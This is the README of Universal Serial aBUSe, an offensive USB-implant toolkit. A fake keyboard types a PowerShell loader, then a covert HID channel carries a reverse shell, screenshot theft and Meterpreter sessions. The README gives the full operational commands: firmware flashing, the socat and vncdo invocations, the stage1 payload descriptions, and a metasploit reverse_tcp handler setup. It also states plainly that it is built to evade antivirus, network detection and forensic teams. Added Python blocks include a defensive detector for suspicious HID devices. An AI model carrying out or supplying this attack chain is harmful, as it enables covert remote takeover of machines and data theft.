
Universal Serial aBUSe is a project to demonstrate the risks of hardware bypasses of software security by Rogan Dawes at SensePost.

Introduction

(There's a full write up at https://www.sensepost.com/blog/2016/universal-serial-abuse/)

Universal Serial aBUSe is a project released at Defcon 24 by Rogan Dawes. We took some fairly common attacks (fake keyboards in small USB devices that type nasty things) and extended them to provide us with a bi-directional binary channel over our own wifi network to give us remote access independent of the host's network. This gives us several improvements over traditional "Rubber Ducky" style attacks:

  • We can trigger the attack when we want. No missed executions.
  • We don't use the host's network. No hassle on exfil, or potential for NIDS catching us.
  • We can shrink our initial typed payload to just open the binary pipe. Much less fragile typing required.
  • Lots of heavy lifting can be moved to the hardware, which gives less for stuff like AV to trigger on or DFIR teams to find.
  • We don't show up as a network adapter, our binary pipe is an innocuous device, making it harder to spot.
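A defender-side counterpart to the "innocuous device" point above, added here as an example and not part of USaBUSe or the SensePost code: the binary pipe is a vendor-defined Generic HID interface sitting beside a keyboard (and mouse) on one composite USB device, so an inventory of HID report descriptors by top-level usage page can at least surface that shape for triage. The three descriptors below are constructed (the keyboard and mouse from the HID specification's boot examples, the vendor interface as a typical 64-byte raw in/out report); the sysfs walk assumes the usual `/sys/bus/hid/devices/<id>/report_descriptor` layout with the USB interface as the HID device's parent.

```python
"""Added example (not USaBUSe code): group HID report descriptors per USB
device and flag keyboard + vendor-defined ("raw") HID combinations."""
from pathlib import Path

GENERIC_DESKTOP = 0x01
USAGE_MOUSE = 0x02
USAGE_KEYBOARD = 0x06


def parse_top_level(desc: bytes):
    """Return (usage_page, usage) for every top-level Application collection.
    Short item prefix = tag<<4 | type<<2 | size; long items (0xFE) are skipped."""
    pairs, usages, depth, usage_page, i = [], [], 0, 0, 0
    while i < len(desc):
        prefix = desc[i]
        if prefix == 0xFE:                      # long item: never carries usages
            i += 3 + desc[i + 1]
            continue
        size = {0: 0, 1: 1, 2: 2, 3: 4}[prefix & 0x03]
        data = int.from_bytes(desc[i + 1:i + 1 + size], "little")
        kind = prefix & 0xFC                    # tag + type with size bits masked
        i += 1 + size
        if kind == 0x04:                        # Global: Usage Page
            usage_page = data
        elif kind == 0x08:                      # Local: Usage (4-byte form embeds its page)
            usages.append((data >> 16, data & 0xFFFF) if size == 4 else (usage_page, data))
        elif kind == 0xA0:                      # Main: Collection
            if depth == 0 and data == 0x01 and usages:   # Application collection
                pairs.append(usages[0])
            depth += 1
            usages = []
        elif kind == 0xC0:                      # Main: End Collection
            depth -= 1
            usages = []
        elif kind in (0x80, 0x90, 0xB0):        # Input/Output/Feature reset locals
            usages = []
    return pairs


def roles_of(descriptors):
    """Map a device's HID interfaces to coarse roles."""
    roles = set()
    for desc in descriptors:
        for page, usage in parse_top_level(desc):
            if page == GENERIC_DESKTOP and usage == USAGE_KEYBOARD:
                roles.add("keyboard")
            elif page == GENERIC_DESKTOP and usage == USAGE_MOUSE:
                roles.add("mouse")
            elif 0xFF00 <= page <= 0xFFFF:      # vendor-defined usage page
                roles.add("vendor-raw")
            else:
                roles.add("other")
    return roles


def triage(devices):
    """devices: name -> list of report descriptors. Returns name -> (roles, flagged).
    Flag = a keyboard that also exposes a vendor-defined raw channel; legitimate
    gaming/macro keyboards do this too, so treat a hit as a prompt to look, not proof."""
    out = {}
    for name, descs in devices.items():
        roles = roles_of(descs)
        out[name] = (sorted(roles), "keyboard" in roles and "vendor-raw" in roles)
    return out


def collect_from_sysfs(hid_root=Path("/sys/bus/hid/devices")):
    """Read live descriptors, grouped by the parent USB device directory
    (assumed layout: .../<usb-dev>/<usb-dev>:1.N/<hid-id>/report_descriptor)."""
    devices = {}
    if not hid_root.is_dir():
        return devices
    for hid in hid_root.iterdir():
        rd = hid / "report_descriptor"
        if rd.is_file():
            usb_dev = hid.resolve().parent.parent
            devices.setdefault(usb_dev.name, []).append(rd.read_bytes())
    return devices


# Constructed sample descriptors (HID spec boot keyboard / boot mouse / a raw 64-byte vendor interface).
KEYBOARD_DESC = bytes.fromhex(
    "05 01 09 06 A1 01 05 07 19 E0 29 E7 15 00 25 01 75 01 95 08 81 02 95 01 75 08 81 01"
    "95 05 75 01 05 08 19 01 29 05 91 02 95 01 75 03 91 01 95 06 75 08 15 00 25 65 05 07"
    "19 00 29 65 81 00 C0")
MOUSE_DESC = bytes.fromhex(
    "05 01 09 02 A1 01 09 01 A1 00 05 09 19 01 29 03 15 00 25 01 95 03 75 01 81 02 95 01"
    "75 05 81 01 05 01 09 30 09 31 15 81 25 7F 75 08 95 02 81 06 C0 C0")
VENDOR_DESC = bytes.fromhex(
    "06 00 FF 09 01 A1 01 09 02 15 00 26 FF 00 75 08 95 40 81 02 09 03 15 00 26 FF 00"
    "75 08 95 40 91 02 C0")
SAMPLE_DEVICES = {
    "constructed plain keyboard": [KEYBOARD_DESC],
    "constructed keyboard+mouse+raw gadget": [KEYBOARD_DESC, MOUSE_DESC, VENDOR_DESC],
}

if __name__ == "__main__":
    for name, (roles, flagged) in triage({**SAMPLE_DEVICES, **collect_from_sysfs()}).items():
        print(f"{'FLAG' if flagged else '    '} {name}: {', '.join(roles)}")
```

Run it on a Linux host to list every HID device's roles alongside the constructed samples; anything marked FLAG deserves a look at its vendor/product IDs and where it is plugged in. Non-USB HID transports (Bluetooth, I2C) will group under a different parent name, which is harmless for this purpose.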

Lastly, we wanted this to be a working, end-to-end, attack. This means we also spent time adding some nifty features like:

  • A mouse jiggler to prevent the screen saver from activating (but with no visible movement of the mouse)
  • Optimised payloads that are hidden from a user within 4s of their activation
  • An ability to integrate your favourite payload

Linux Update

Software for using low-cost Linux hardware, such as the BeagleBone Black, Raspberry Pi Zero (and now W, too!), Orange Pi Zero, etc., was released recently. This enhances the protocol used over the "pipe" to support multiple concurrent connections, allowing things like meterpreter upgrades, beaconing C&C, etc., to work over USaBUSe. The new software includes the following:

  1. A Linux shell script to configure the USB gadget (and remove it again).
  2. A VNC server implementation that emits keystrokes and mouse movements via a composite HID device.
  3. Updated PowerShell code implementing the new multiplexing protocol, both for the initial bootstrap and as a more fully featured implementation.
  4. A HIDProxy implementation that reads and writes the raw HID device, and converts it back into multiple socket connections as necessary. It also delivers the second-stage PowerShell code.

Getting started with the Linux implementation is a matter of running the shell script to configure the USB gadget (currently identical to the AVR implementation of USaBUSe), running the VNC server, and the HID proxy, and setting up your listener to catch the incoming shell!

Running on Linux

I'll assume that you have the SBC installed with a version of Linux. Depending on the SBC, you may have to jump through other hoops to get the OTG interface working. For example, on the Raspberry Pi Zero, follow Gbaman's guide. On the BeagleBone Black, everything is configured already, as far as I recall.

To make sure it is ready, check that the following command returns a result:

ls -l /sys/class/udc/

You will likely need a few prerequisites before you continue, particularly:

sudo apt install git libvncserver-dev build-essential

Then

git clone https://github.com/SensePost/USaBUSe

Run the script to configure the USB gadget:

cd USaBUSe/linux
sudo ./configure_USB.sh

You should see the OS recognise the new device, and load the drivers.

Compiling the VNC server should be fairly simple, just run make in the appropriate directory.

cd ../vncserver
make
./usabuse_vnc &

Or alternatively, do not background it, and continue in a new terminal window (e.g. using screen).

At this point, you need to make a decision about where you want to run the HID proxy server. As a Java application, it can be a little heavyweight to run on a small SBC. It can run OK on the Pi Zero, but there is not a huge amount of memory available. The alternative, which is the recommended approach, is to forward the HID device file over the network to a more capable computer, using socat:

while sleep 5; do socat TCP:192.168.2.1:65534 /dev/hidg1; done

Substitute the 192.168.2.1 IP address for that of your own workstation. This will continuously attempt to connect to the HID Proxy server, and only then start reading and writing from the HID device.

Install Java on the computer you plan to run the HIDProxy on:

sudo apt install oracle-java8-jdk maven2
mvn package
java -jar target/hidproxy-1.0.0.one-jar.jar

By default, the application will listen on *:65534 for an incoming connection, assuming that the HIDProxy is being run on a different machine to the SBC. To run it on the SBC, run it as follows:

java -Dsource=/dev/hidg1 -jar target/hidproxy-1.0.0.one-jar.jar

By default, HIDProxy will forward connections on channel 1 to localhost:4444, and any higher connections to localhost:65535. This is because the first connection is always the cmd shell, and any other connections will be connections to localhost:65535 on the victim.

See https://sensepost.com/blog/2017/usabuse-linux-updates/ for an example of how to use the TCP forwarding with Meterpreter.

Getting the Code

This repository has instructions and code for building the Universal Serial aBuse firmwares and host software. Start off by performing a recursive clone of the repository:

$ git clone --recursive https://github.com/sensepost/USaBUSe

This can take some time, please be patient!

If you'd like to just run the attacks, then you don't need to clone all the submodules. The latest release (https://github.com/sensepost/USaBUSe/releases) will have precompiled firmware. After that you'll just need:

  • esptool to flash the firmware
  • vncdotool to run the automated interaction on the client
  • the scripts in this repository for the payloads and orchestration

Programming the firmwares

  $ esp-vnc/flash_esp esp-vnc/firmware/user1.bin avr/KeyboardMouseGeneric/KeyboardMouseGeneric.hex

Note: The flash_esp and flash_avr shell scripts contain a pattern which usually manages to identify the serial port that the AVR appears at. If you have other USB Serial interfaces connected, you may want to either unplug them, or update the pattern to exclude the incorrect ports.

Interacting with the device

To send keystrokes and mouse movements to the device, use a VNC client. The password is hard coded to "password".

To do this in an automated way, the vncdo tool is very useful. It is referenced as a submodule; to install it:

  $ cd vncdotool
  $ python setup.py install

Note: vncdotool is only compatible with Python 2.7, not Python 3+.

  $ vncdo -s esp-link.lan -p password type "echo hello" key enter

A more comprehensive example might be:

  $ vncdo -s esp-link.lan -p password key meta-r pause 1 type powershell key enter pause 1 typefile powershell/read_exec.ps1

If esp-link.lan does not resolve, look for port 23 and 5900 on the local network, or check your DHCP server.

Interacting with the Generic HID interface requires the victim-side code found under the powershell/ directory, as well as the attacker-side code found in stage.sh.

A demonstration of a complete, end-to-end attack can be found in attack.sh.

In summary, the way it works is for the attacker to use VNC to type out a stage0 payload (currently using powershell), which has just enough smarts to open the higher-bandwidth channel (currently only Generic HID is implemented), and load and execute a more complicated stage1 payload. There are a couple of stage1 payloads implemented currently:

  • spawn.ps1 - Run cmd.exe, and pipe stdout/stderr over the device, while reading from the device, and writing that to stdin of the process.
  • screenshot.ps1 - take a screenshot of the desktop, and send it over the device.
  • msf_proxy.ps1 - Open a TCP socket on localhost:65535, and relay data back and forth over the device. In a separate thread, invoke the metasploit stage loader, connecting to localhost:65535. This can be used to run a msfconsole windows/shell/reverse_tcp or even (with some patience!) a full windows/meterpreter/reverse_tcp.

Patience is required because the USB device does not have particularly high bandwidth. Generic HID is limited to 64KB/s, and the UART between the two microprocessors is limited to 250kbps (25KBps), but other limitations (many likely due to naive implementation!) limit us even further! Currently, we are achieving approximately 4KBps.

Patches to improve the speed (and any other aspect of the system) are welcome!

Once the basic stage0 payload has been typed out via VNC, the second stage is sent via the Generic HID interface (only implementation currently).

read_exec.ps1 expects to receive the next stage in the following format:

<stage length high byte><stage length low byte><powershell stage>

The included stage.sh shell script takes care of this process for you.

Note! There is an important sleep included between sending the second stage, and connecting the socket to the final endpoint (msf, etc). The reason for this is that the second stage may not finish on a 63-byte boundary, and if the final endpoint starts sending data prematurely, some of that data may end up "packed" into the empty space in the last packet of the stage2 payload. Currently, the stage0 loader has no mechanism to keep this data aside for later use by the second stage, and it gets discarded. Introducing a sleep ensures that any data from the final endpoint does not get packed in with the stage2 payload, and avoids data corruption.
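The framing described in the two notes above, modelled as an added example that is not USaBUSe's own code: a 2-byte big-endian length prefix followed by the stage, carried in 64-byte Generic HID reports. The report layout used here (byte 0 = number of valid payload bytes, then up to 63 payload bytes) is an assumption made for the model, and the stage and endpoint bytes are constructed; the point is to make visible which bytes a loader that reads whole reports throws away when the final endpoint starts talking too early.

```python
"""Added example (not USaBUSe code): length-prefixed stage framing over
64-byte HID reports, and the bytes lost when the endpoint sends too soon."""

REPORT_SIZE = 64
PAYLOAD_PER_REPORT = REPORT_SIZE - 1   # assumed layout: byte 0 = valid-byte count


def frame_stage(stage: bytes) -> bytes:
    """<stage length high byte><stage length low byte><stage>, as read_exec.ps1 expects."""
    if len(stage) > 0xFFFF:
        raise ValueError("stage too long for a 16-bit length")
    return len(stage).to_bytes(2, "big") + stage


def pack_reports(stream: bytes):
    """Chop a byte stream into zero-padded 64-byte reports, 63 payload bytes each."""
    reports = []
    for off in range(0, len(stream), PAYLOAD_PER_REPORT):
        chunk = stream[off:off + PAYLOAD_PER_REPORT]
        reports.append(bytes([len(chunk)]) + chunk.ljust(PAYLOAD_PER_REPORT, b"\0"))
    return reports


def unpack_reports(reports) -> bytes:
    """Inverse of pack_reports: keep only the valid bytes of each report."""
    return b"".join(r[1:1 + r[0]] for r in reports)


def naive_stage_read(reports):
    """Model a stage0 loader that pulls whole reports until the declared length
    is satisfied and keeps nothing beyond it. Returns (stage, discarded_bytes)."""
    it = iter(reports)
    buf = b""

    def need(n):
        nonlocal buf
        while len(buf) < n:
            try:
                buf += unpack_reports([next(it)])
            except StopIteration:
                raise ValueError("stream ended before the declared stage length") from None

    need(2)
    length = int.from_bytes(buf[:2], "big")
    need(2 + length)
    return buf[2:2 + length], buf[2 + length:]


def simulate(stage: bytes, endpoint_data: bytes, pause_before_endpoint: bool):
    """Return (stage_received_intact, endpoint_bytes_lost).
    With the pause, the endpoint's data starts in a fresh report; without it,
    the data is packed into the spare space of the stage's last report."""
    if pause_before_endpoint:
        reports = pack_reports(frame_stage(stage)) + pack_reports(endpoint_data)
    else:
        reports = pack_reports(frame_stage(stage) + endpoint_data)
    received, discarded = naive_stage_read(reports)
    return received == stage, discarded


if __name__ == "__main__":
    stage = b"X" * 100                  # constructed 100-byte stage
    endpoint = b"0123456789" * 3        # constructed first 30 bytes from the listener
    for pause in (True, False):
        ok, lost = simulate(stage, endpoint, pause)
        print(f"pause={pause}: stage intact={ok}, endpoint bytes lost={len(lost)} {lost!r}")
```

With a 100-byte stage the framed payload is 102 bytes, so the second report has 24 bytes of slack: without the pause the first 24 endpoint bytes land there and are silently dropped, while a stage whose framed length is an exact multiple of 63 loses nothing even without the pause, which is the "63-byte boundary" condition the note refers to.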

Using Metasploit Framework

The current attack.sh script expects to connect to a listener running on port 4444 on localhost. Exactly what sort of listener that should be depends on the stage1 script that was sent. If you send spawn.ps1, the listener can be a simple "nc -l -p 4444". If you are sending msf_proxy.ps1, the listener should be an appropriately configured msfconsole. You can choose your payload as you like, from the group of payloads that make use of a staged/reverse_tcp connection.

For example:

./msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit

NB: Do NOT set LHOST to 127.0.0.1, this is an internal "magic number" used by metasploit for its own purposes. Things randomly break if you do!

Building the AVR firmware

On OS X, the AVR compiler can be obtained by installing the Arduino app, e.g. via Homebrew Cask (Caskroom/cask/arduino).

Linux can install using apt-get:

  $ sudo apt-get install gcc-avr avr-libc avrdude

Once the avr tools are installed, and avr-gcc is in your PATH, compile the avr firmwares:

  $ cd avr
  $ make

This should build two firmwares, Program_ESP and KeyboardMouseGeneric, i.e. you should have .hex files in each directory.

Building the ESP8266 firmware

Once the recursive clone has completed, build the esp-open-sdk (make sure to build the STANDALONE version!). OS X users PLEASE NOTE that this step MUST be done on a case-sensitive filesystem!

  $ cd esp-open-sdk
  $ make STANDALONE=n

Once the esp-open-sdk has compiled, in the top-level directory, do:

  $ wget --content-disposition "http://bbs.espressif.com/download/file.php?id=1046"
  $ unzip ESP8266_NONOS_SDK_V1.5.1_16_01_08.zip

If you are on OS X, you will probably need to install GNU sed, and make sure it is in your PATH. An easy way of doing this is to use HomeBrew:

  $ brew install gnu-sed
  $ export PATH="/usr/local/opt/gnu-sed/libexec/gnubin:$PATH"

Alternatively, to ensure that it remains accessible after you log out, and to avoid strange errors on future builds, add it to your bash profile.

If you run into such errors, be sure to run "make clean" to remove any broken artifacts before trying to build again.

At this stage, you should be able to change to the esp-vnc directory, and run make to build the ESP8266 firmware.

  $ cd esp-vnc
  $ make

NOTE: It is expected to get errors regarding incorrect parameters passed to stat on OS X. This is part of the original esp-link makefile, and has not been corrected. It does not affect the final firmware build, it is just a check to make sure that the firmware is not too big.

This should result in a user1.bin file in the esp-vnc/firmware directory.
